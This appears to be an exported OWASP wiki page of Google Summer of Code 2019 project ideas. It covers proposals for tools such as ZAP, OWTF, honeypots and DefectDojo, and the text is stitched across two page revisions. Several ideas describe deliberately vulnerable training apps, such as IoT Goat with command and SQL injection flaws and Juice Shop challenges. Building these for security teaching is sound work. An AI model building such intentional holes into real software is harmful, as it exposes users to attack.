*The "Requester" module checks if there is any login parameters provided (i.e form-based or script - look at https://github.com/owtf/login-sessions-plugin)<br />
*Create a browser instance and do the necessary login procedure<br />
*Handle the browser for the URI<br />
*When called to close the browser, do a clean logout and kill the browser instance.<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
'''Knowledge Prerequisite:''' Python proficiency, some previous exposure to security concepts and penetration testing is welcome but not strictly necessary as long as there is will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - Web interface enhancements===<br />
'''Brief explanation:'''<br />
<br />
The current web interface is a mixture of Tornado Jinja templates and ReactJS. A complete UI change to a stable ReactJS-based interface should be the deliverable for this project. Most of the hard part for the change has already been done and added in a separate branch at https://github.com/owtf/owtf/tree/develop.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT:Clean, maintainable (ES6 compatible and using recommended design patterns) React (JavaScript) code. ([https://github.com/getsentry/zeus/tree/master/webapp This] is a good example!)'''<br />
*'''IMPORTANT: Thoroughly documented code along with API examples and example future components.'''<br />
*'''CRITICAL''': Excellent reliability and performance.<br />
*Unit tests / Functional tests and easy to setup testing environment (preferably automated).<br />
'''Knowledge Prerequisite:''' Python (reading API source code and endpoints), React.JS (high proficiency) and general JavaScript proficiency.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - New plugin architecture===<br />
'''Brief explanation:'''<br />
<br />
The current plugin system is not very useful and it is painful to browse many plugins. Most of the plugins do have much code and most of is repeated - much refactoring needed there.<br />
<br />
This issue is documented in detail at https://github.com/owtf/owtf/issues/905.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
<br />
== OWASP iGoat (draft) ==<br />
'''Idea 1:''' Completing OWASP iGoat documentation at https://docs.igoatapp.com/ and creating demo videos at for OWASP iGoat YouTube channel for learning purpose.<br />
<br />
'''Idea 2:''' Adding new challenge pack / CTF for iGoat. It should be one point solution for learning iOS app security<br />
<br />
== OWASP Seraphimdroid ==<br />
[[OWASP SeraphimDroid Project|OWASP Seraphimdroid]] is Android security and privacy app, with features to enhance user's knowledge about security and privacy on his/her mobile device. If you are interested in this project and working on it during Google Summer of Code, please contact [[User:Nikola Milosevic|Nikola Milosevic]] and express your interest.<br />
<br />
=== Idea 1: Anomaly detection of device state ===<br />
The idea is that certain features of a device would be constantly monitored (battery use, internet usage, opp calls, etc.). Initially, the usual behaviour of the device would be learned. Later, anomalies normal behavior would be reported to the user. This should involve some explanations, such as which applications are causing an anomaly the device behaviors <br />
<br />
=== Idea 2: On device machine learning of maliciousness of an app ===<br />
Tensor-flow for on-device processing and some other libraries have been released that enable machine learning. We have previously applied a system, that based on permissions, is able to distinguish malicious apps from non-malicious. Now, we would like to learn also from other outputs and things one can monitor about application whether it can be malicious. <br />
<br />
=== Idea 3: Enhansing privacy features ===<br />
The vision of Seraphimdroid is to be aware of privacy threats. This may be achieved throug knowing which applications are using user accounts or other information that uthe user has on phone to send to the server, or just by knowing which applications may be doing it. Knowledgebase shouldbbeextending with the suggestions on how to improve privacy. Also, automated settings of various apps to use encryption should be proposed.<br />
==OWASP ZAP==<br />
[[OWASP Zed Attack Proxy Project]] (ZAP) The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. Previous GSoC students have implemented key parts of the ZAP core functionality and have been offered (and accepted) jobs based on their work on ZAP.<br />
<br />
=== Active Scanning WebSockets ===<br />
: '''Brief Explanation:'''<br />
: ZAP has good support for websockets, and allows them to be intercepted, changed and fuzzed. Unfortunately it doesn't currently support active scanning (automated attacking) of websocket traffic (messages).<br />
: We would like to add active scanning support to websockets, ideally in a generic way which would allow us to reuse as many of our existing rules as are relevant. Adding additional websocket specific attacks would also be very useful.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* An pluggable infrastructure that allows us to active scan websockets<br />
:* Converting the relevant existing scan rules to work with websockets<br />
:* Implementing new websocket specific scan rules<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
=== Automated Authentication Detection and Configuration ===<br />
: '''Brief Explanation:'''<br />
: Currently a user must manually configure ZAP to handle authentication, eg as per <nowiki>https://github.com/zaproxy/zaproxy/wiki/FAQformauth</nowiki><br />
: This is time consuming and error prone.<br />
: Ideally ZAP would help detect login and registration pages and provide more assistance when configuring authentication, ideally being able to completely automate the task for as many sort of webapps as possible.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* Detect login and registration pages<br />
:* Provide a wizard to walk users through the process of setting up authentication, with as much assistance as possible<br />
:* An option to completely automate the authentication process, for as many authentication mechanisms as possible<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
:<br />
<br />
== IoT Goat ==<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf IoT Top 10 2018]. <br />
<br />
===Idea 1: Insecure firmware web application ecosystem===<br />
'''Brief Explanation:'''<br />
<br />
A vulnerable web application, and backend API/web services deployed in OpenWrt containing critical vulnerabilities showcasing the traditional IoT problems.<br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat/blob/master/BuildEnvironment.md<br />
* Create a GitHub account to be a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/Examples/Weak%2C%20Guessable%2C%20or%20Hardcoded%20Passwords.md[https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md hand ttps://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md]<br />
<br />
'''Expected Results:'''<br />
<br />
Development of a simple web application user interface with web services and API's deployed locally on the OpenWrt firmware. Documented challenges of how to discover and remediate web software security vulnerabilities. The insecure web application services must contain the following vulnerabilities to be used with the IoT testing guide: <br />
* Command injection<br />
* SQL injection<br />
* Local file inclusion <br />
* XXE injection,Insufficient Authentication<br />
* Transfer sensitive data using insecure channels<br />
* Store sensitive data insecurely<br />
Vulnerable SOAP web services and REST API implementations are in-scope. <br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded and/or web development (nice to have)<br />
** Web application code can be developed using the following common embedded programming languages:<br />
*** Lua<br />
*** PHP<br />
*** C/C++<br />
*** JavaScript<br />
<br />
===Idea 2: Insecure network services===<br />
'''Brief Explanation:'''<br />
<br />
Deliberately insecure services configured within OpenWrt such as an miniupnp daemon configured with secure_mode off (Secure mode; client can only redirect an incoming port to the client itself (same IP as the request comes from), to demonstrate a port mapping attack where an attacker from inside the network exposes a service that typically should be behind a LAN to the internet). <br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat#-getting-started-<br />
* Create a GitHub account to be added as a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Documented challenges of how to discover and remediate insecure network service vulnerabilities. The network services can be inherently insecure or have insecure configurations that can be abused during the challenges.<br />
* Example of network insecure services include:<br />
** FTP<br />
** Telnet<br />
** miniupnpd<br />
** HTTP<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Network security<br />
<br />
===Idea 3: Insecure firmware build system===<br />
'''Brief Explanation:'''<br />
<br />
Develop custom firmware builds of the latest OpenWrt version (18.06) demonstrating the process of incorporating debug services/tools, misconfigurations, and usage of vulnerable software packages. <br />
<br />
''' Getting started '''<br />
* Review OpenWrt's developer guide to get familiar with creating custom firmware builds<br />
** https://openwrt.org/docs/guide-developer/start<br />
** https://openwrt.org/docs/guide-developer/build-system/install-buildsystem<br />
** https://github.com/openwrt/openwrt<br />
<br />
'''Expected Results:'''<br />
* Provide walkthrough examples of insecure design choices for building firmware. <br />
* Provide suggested mitigation security controls<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded development (C/C++)<br />
<br />
===Suggest your own ideas===<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
=== Mentors and Leaders ===<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
==OWASP Web Honeypot Project ==<br />
<br />
The goal of the OWASP Honeypot Project is to identify emerging attacks against web applications and report them to the community, in order to facilitate protection against such targeted attacks. Within this project, Anglia Ruskin University is leading the collection, storage and analysis of threat intelligence data. <br />
<br />
https://www.owasp.org/index.php/OWASP_Honeypot_Project<br />
<br />
https://github.com/OWASP/Honeypot-Project/<br />
<br />
<br />
===Brief Explanation===<br />
The purpose of this part of the project is to capture intelligence on attacker activity against web applications and utilise this intelligence as ways to protect software against attacks. Honeypots are an established industry technique to provide a realistic target to entice a criminal, whilst encouraging them to divulge the tools and techniques they use during an attack. Like bees to a honeypot. These honeypots are safely designed to contain no information of monetary use to an attacker, and hence provide no risk to the businesses implementing them. <br><br />
<br />
The project will create honeypots that the community can distribute within their own networks. With enough honeypots globally distributed, we will be in a position to aggregate attack techniques to better understand and protect against the techniques used by attackers. With this information, we will be in a position to create educational information, such as rules and strategies, that application writers can use to ensure that any detected bugs and vulnerabilities are closed. <br><br />
<br />
===Idea===<br />
Project progression: <br />
* Honeypot software. The honeypot software that is to be provided to the community to place in their networks has been written. Honeypots are available in a variety of forms, to make deployment as flexible as possible and appeal to a diverse a user set as possible.<br />
* Collection software. The centralised collection software has been written and evaluated in a student driven proof-of-concept project. Honeypots have been attacked in a laboratory situation and have reported both the steps taken by the attacker and what they have attacked, back to the collection software.<br />
* Rollout to the Community. The project now needs a dedicated infrastructure platform in place that is available to the entire community to start collecting intelligence back from community deployed honeypots. This infrastructure will run the collector software, analysis programmes and provide a portal for communicating our finds and recommendations back to the community in a meaningful manner.<br />
* Going Forward. Toolkits and skills used by attackers do not stand still. As existing bugs are plugged, others open. Follow up stages for the project will be to create a messaging system to automatically update the community on findings of significant risk in their existing code that requires attention. <br />
<br />
<br />
===Expect Results ===<br />
<br />
Some of the ideas from last year's summit<br />
<br />
* Setup Proof of Concept to understand how Mod Security baed Honeypot/Probe interacts with a receiving console (develop a VM and/or Docker based test solution to store logs from multiple probes).<br />
* Evaluate console options to visualise threat data received from ModSecurity Honeypots/probes in MosSecurity Audit Console, WAF-FLE, Fluent and bespoke scripts for single and multiple probes.<br />
* Develop a mechanism to convert from stored MySQL to JSON format.<br />
* Provide a mechanism to convert ModSecurity mlogc audit log output into JSON format.<br />
* Provide a mechanism to convert mlogc audit log output directly into ELK (ElasticSearch/Logstash/Kibana) to visualise the data.<br />
* Provide a mechanism to forward honest output into threat intelligence format such as STIX using something like the MISP project(https://www.misp-project.org) to share Threat data coming from the Honeypots making it easy to export/import data from formats such as STIX and TAXII., may require use of concurrent logs in a format that MISP can deal with.<br />
* Consider new alternatives for log transfer including the use of MLOGC-NG or other possible approaches.<br />
* Develop a new VM based honeypot/robe based on CRS v3.0.<br />
* Develop new alternative small footprint honeypot/probe formats utilising Docker & Raspberry Pi.<br />
* Develop machine learning approach to automatically be able to update the rule set being used by the probe based on cyber threat intelligence received.<br />
<br />
<br />
=== Students Requirements ===<br />
<br />
Some of the skills we are looking for:<br />
<br />
* Apache/Tomcat <br />
* Any experience of MISP<br />
* MySQL & JSON<br />
* ELK <br />
* STIX/TAXII<br />
* Python<br />
* ModSecurity/mlogc<br />
* OWASP Core RuleSet (CRS)<br />
* Linux<br />
* VM/Docker<br />
<br />
=== Mentors === <br />
<br />
* [mailto:adrian.winckles@owasp.org Adrian Winckles] - (OWASP Web Honeypot Project Leader) <br><br />
<br />
===Suggest your own ideas===<br />
<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
==OWASP Risk Assessment Framework ==<br />
Tool projects aim to assessment more than one or many web application using owasp risk rating mathodologies.<br />
<br />
https://github.com/OWASP/RiskAssessmentFramework<br />
<br />
'''Idea 1:''' make dashboard with database and can assess many website based owasp risk rating mathodologies, create graph and report in pdf,word & excel format.<br><br />
Ideas 2 : Static Application Security Testing. <br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Java<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (Mentor) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A]- (Mentor)<br />
<br></div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=GSoC2019_Ideas&diff=249037GSoC2019 Ideas2019-03-20T17:36:38Z<p>Aaron.guzman: /* IoT Goat */</p>
<hr />
<div>=OWASP Project Requests=<br />
<br />
'''Tips to get you started in no particular order:''' <br />
'''* Read [https://developers.google.com/open-source/gsoc/ Google Summer of Code Program(GSOC)]`'''<br />
'''* Read the [[GSoC SAT]] '''<br />
* Read the [https://www.owasp.org/index.php/GSoC GSOC Student Guidelines]<br />
* Contact us through the mailing list or irc channel.<br />
* Check our [https://github.com/OWASP github organization]<br />
<br />
<br />
==OWASP-SKF==<br />
<br />
=== Idea 1 Improving the Machine Learning chatbot: ===<br />
We want to extend the functionality of SKF Bot. (Security Knowledge Framework Chatbot):<br />
<br />
Some improvements or the suggestions which we can do to improve the functionality are:<br />
<br />
1. Create a desktop version of the chatbot. Where people can install the setup file on their local machine.<br />
<br />
2. Create a Plugin or website bot which we can add in the website for better chat experience for the user.<br />
<br />
3. Extend the bots capability to do the google search (using web scraping) for the things which are not available in the database. So, it will have a wider scope of knowledge.<br />
<br />
4. Add basic conversation flow which makes SKF Bot friendly and provides the better user experience. Example: Replies to the general queries like How are you? What is your Name etc?<br />
<br />
5. Extend the bot capability to reply to what security controls should be followed from the ASVS and MASVS or other custom checklists that are present in SKF.<br />
# Extend the bot to different platforms like Facebook, telegram, slack, Google Assistant etc.<br />
Existing chatbot implementation is on Gitter. You can test the bot by typing @skfchatbot on Gitter Community.<br />
<br />
'''Getting started:'''<br />
<br />
· Get familiar with the architecture and code base of SKF (Security Knowledge Framework)<br />
<br />
· Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
<br />
· Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
<br />
· Python 3+, Flask, Coffee Script<br />
<br />
'''Mentors and Leaders'''<br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor)<br />
<br />
=== Idea 2 Improving and building Lab challenges and write-ups: ===<br />
Build lab examples and write-ups (how to test) for different vulnerabilities over different technology stacks. These challenges are to be delivered in Docker so they can be <br />
<br />
easily deployed.<br />
<br />
In the current situation the security knowledge framework ultimately presents a list of security controls with correlating knowledge base items that contain a description and <br />
<br />
a solution. The new labs are used to give the software developers or application security specialists a more in depth understanding and approach on how to test the <br />
<br />
vulnerabilities in their own code. <br />
* For example we have now around 20 lab challenges in Docker container build in Python:<br />
** A Local File Inclusion Docker app example:<br />
*** https://github.com/blabla1337/skf-labs/tree/master/LFI<br />
** A write-up example:<br />
*** https://owasp-skf.gitbook.io/asvs-write-ups/filename-injection<br />
The images that are pushed to the Github repository are already automatically build and pushed to a docker registry where the SKF users can easily pull the images from to get their<br />
<br />
labs running. Of course they can download it and build it themselves from source by pulling the original repository. <br />
<br />
'''Mentors and Leaders''' <br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
== OWASP DefectDojo ==<br />
OWASP DefectDojo is a popular open source vulnerability management tool and is used as the backbone for security programs. It is easy to get started with to work on! We welcome volunteers of all experience levels and are happy to provide mentorship.<br />
<br />
'''Issue Tracking:'''<br />
<br />
Enhancement [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Aenhancement requests] and [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Abug bugfixes] are located in Github issues. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. <br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP DefectDojo<br />
* Each feature comes with full functional unit and integration tests<br />
'''Getting started:'''<br />
* Get familiar with the architecture and code base of the application built on Django<br />
* Review the application functionality and familiarize yourself with Products, Engagements, Tests and Findings.<br />
* Get familiar with the CI/CD process based on Travis-CI<br />
'''Knowledge Prerequisites:'''<br />
* Python, Django, Javascript, Unit/Integration testing.<br />
'''Potential Mentors:'''<br />
* [[Mailto:aaron.weaver2+gsoc@gmail.com|Aaron Weaver]] - DefectDojo Project Leader<br />
* [[Mailto:greg.anderson@owasp.org|Greg Anderson]] - DefectDojo Project Leader<br />
* [[Mailto:matt.tesauro@owasp.org|Matt Tesauro]] - DefectDojo Project Leader<br />
'''Option 1: Unit Tests - Difficulty: Easy'''<br />
* If you're new to programming, unit tests are short scripts designed to test a specific function of an application.<br />
* The project needs additional unit tests to ensure that new code functions properly. <br />
* Review the current [https://github.com/DefectDojo/django-DefectDojo/tree/dev/dojo/unittests unit tests] <br />
* Complete Code Coverage Testing<br />
** Validate Tests exist for the following (create any that are missing):<br />
*** Finding, Test, Engagement, Reports, Endpoints <br />
*** Import from all scanners <br />
'''Option 2: Python3 Completion'''<br />
* DefectDojo is finishing up a migration to Python3<br />
Test the current [https://github.com/DefectDojo/django-DefectDojo/tree/python3/dojo/unittests state] of Python3<br />
* Ensure all features work<br />
* Travis testing works correctly<br />
'''Option 3: Scan 2.0 / Launch Containers'''<br />
<br />
Scan 2.0 consists of automating the scanning orchestration within DefectDojo. Several proof of concepts exist for this using the AppSecpPipeline to launch containers and then push those finding into the appropriate product. <br />
* Use the [https://github.com/appsecpipeline/AppSecPipeline-Specification AppSecPipeline] containers to build a scanning pipeline built on top of [https://www.openfaas.com/ OpenFaaS]<br />
* Scans should be able to be scheduled by DefectDojo and then invoked via the REST API call to OpenFaaS<br />
* Upon scan completion the results will be posted back to DefectDojo via DefectDojo's REST API and consumed as an engagement/test.<br />
* Pick 2 or 3 popular open source scanners such as NMAP, ZAP and Nikto to start out with.<br />
<br />
== OHP (OWASP Honeypot) ==<br />
<br />
[[OWASP_Python_Honeypot|OWASP Honeypot]] is an open source software in Python language which designed for creating honeypot and honeynet in an easy and secure way! This project is compatible with Python 2.x and 3.x and tested on Windows, Mac OS X and Linux.<br />
<br />
=== Getting Start ===<br />
<br />
It's best to start from [https://github.com/zdresearch/OWASP-Honeypot/wiki GitHub wiki page], we are looking forward to adding more modules and optimize the core.<br />
<br />
=== Technologies ===<br />
<br />
Currently we are using<br />
<br />
* Docker<br />
* Python<br />
* MongoDB<br />
* TShark<br />
* Flask<br />
* ChartJS<br />
* And more linux services<br />
<br />
=== Expected Results ===<br />
<br />
* Zero Bugs: Currently we may have several bugs in different conditions, and it's best to test the all functions and fix them<br />
* Monitoring: Right now monitoring limited to the connections (send&recieve) and it's best to store and analysis the contents for farther investigations and recognizing incoming attacks.<br />
* Duplicated codes: codes are complicated and duplicated in engine, should be fixed/clean up<br />
* New modules: add some creative ICS/Network/Web modules andvulnerable web applications, services and stuff<br />
* API: update API sync to all features<br />
* WebUI: Demonstrate and add API on WebUI and Live version with all features<br />
* WebUI Special Reports: Track the attacks more creative and provide high risk IPs<br />
* Database: Better database structure, faster and use queue<br />
* Data analysis: Analysis stored data and attack signatures<br />
* OWASP Top 10: Preparing useful processed/raw data for OWASP top 10 project<br />
<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Packet Analysis & Tshark & Libpcap<br />
* Docker<br />
* Database<br />
* Web Development Skills<br />
* Honeypot and Deception knowledge<br />
<br />
=== Mentors and Leaders ===<br />
<br />
* [mailto:ali.razmjoo@owasp.org Ali Razmjoo] (Mentor & Project Leader)<br />
* [mailto:ehsan@nezami.me Ehsan Nezami] (Mentor & Project Leader)<br />
* [mailto:reza.espargham@owasp.org Reza Espargham](Mentor)<br />
* [mailto:abiusx@owasp.org Abbas Naderi] (Mentor)<br />
<br />
== OWASP Juice Shop ==<br />
<br />
[[OWASP Juice Shop Project]] is an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws. Juice Shop is written in Node.js, Express and Angular. The application contains more than 30 challenges of varying difficulty where the user is supposed to exploit the underlying vulnerabilities. Apart from the hacker and awareness training use case, pentesting proxies or security scanners can use Juice Shop as a "guinea pig"-application to check how well their tools cope with Javascript-heavy application frontends and REST APIs.<br />
The best way to get in touch with us is the '''community chat on https://gitter.im/bkimminich/juice-shop<nowiki/>.''' You can also send PMs to the potential mentors (@bkimminich, @J12934 and @CaptainFreak) there if you like!<br />
<br />
To receive early feedback please '''put your proposal on Google Docs and submit it to the OWASP Organization on Google's GSoC page''' in ''Draft Shared'' mode. Please pick '''''juice shop'' as Proposal Tag''' to make them easier to find for us. '''Thank you!'''<br />
<br />
=== Feature Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new functionality and "business" features are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Afeature GitHub issues labeled "feature"]. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for features and new functionality in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP Juice Shop (not necessarily including corresponding challenges)<br />
* Each feature comes with full functional unit and integration tests<br />
* Extending the functional walk-through chapter of the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, security knowledge is optional.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Juice Shop Mobile ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
A complete mobile client for Juice-Shop API which will serve a legit mobile experience for Juice-Shop user as well as a plethora of Mobile app vulnerabilities and challenges around them to solve. Should in the best case translate the idea of Juice Shop's hacking challenges with a score board and success notifications into the mobile world.<br />
<br />
''Coming up with a sophisticated proposal (optimally even with a good initial sample implementation) could make the difference between being selected or declined as a student for this project!''<br />
<br />
''' Getting started '''<br />
* Get familiar with the architecture and code base of the application's RESTful backend<br />
* Get familiar with Native App developement<br />
* Get familiar with Mobile vulnerabilities<br />
<br />
'''Expected Results:'''<br />
* A mobile App with consistent UI/UX for Juice-Shop with standard client side vulnerabilities.<br />
* Sufficient initial release quality (en par with Juice Shop and Juice Shop CTF) to make it an official extension project hosted in its own GitHub repository ''bkimminich/juice-shop-mobile''<br />
* Code follows existing styleguides and applies similar quality gates regarding code smells, test coverage etc. as the main project.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) React Native and NodeJS/Express, some Mobile security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Challenge Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new hacking challenges are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Achallenge GitHub issues labeled "challenge"]. This project could implement a whole bunch of challenges one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for challenges in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 10 or more new challenges for OWASP Juice Shop (including required functional enhancements to place the challenges)<br />
* Each challenge comes with full functional unit and integration tests<br />
* Each challenge is verified to be exploitable by corresponding end-to-end tests<br />
* Hint and solution sections for each new challenge are added to the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Hacking Instructor ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
While the Juice Shop is offering a lot of long-lasting motivation and challenges for security experts, it might be a bit daunting for newcomers and less experienced hackers.<br />
The "Hacking Instructor" as sketched in [https://github.com/bkimminich/juice-shop/issues/440 GitHub issue #440] could guide users from this target audience through at least some of the hacking challenges. As this would be an entirely new and relatively independent feature of the Juice Shop, students should be able to bring in their own creativity and ideas a lot.<br />
<br />
''For this project, a good proposal with a design & implementation proposal more sophisticated than the rough ideas in [https://github.com/bkimminich/juice-shop/issues/440 #440] is paramount to be selected as a student!''<br />
<br />
'''Expected Results:'''<br />
* A working implementation of e.g. an avatar-style "Hacking Instructor" or other solution based on the students own proposal<br />
* Coverage of at least the trivial (1-star) and some easy (2-star) challenges<br />
* Documentation how to configure or script the "Hacking Instructor" for challenges in general<br />
<br />
''' Getting started: '''<br />
